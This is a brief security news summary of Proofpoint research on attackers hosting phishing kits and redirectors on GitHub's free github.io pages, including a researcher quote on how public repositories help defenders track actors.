What is the issue - Researchers observed that attackers have been abusing free code repositories in the Github service to host a variety of phishing websites on github.io domains.
Why it matters - These repositories in Github service have been abused by attackers to carry out a wide variety of malicious activities including phishing campaign.
The big picture
Researchers from Proofpoint observed that repositories in Github service have been abused by attackers to carry out a phishing campaign. While some attackers use the github.io domains as a traffic redirector.
Researchers noted that the phishing kits do not use typical hosted PHP methods because the github.io platform does not provide PHP back-end services.
“In contrast to private paid accounts, due to the nature of public GitHub accounts, we were able to observe when actors made changes to their hosted web pages. This visibility may help give insight to the nature of edits performed on phishing kits that were not written from scratch. As most kits are not written from scratch and are instead simply modified by different actors to suit their individual purposes, this level of visibility may be useful for defenders tracking actor behavior and attribution,” researchers wrote in a blog.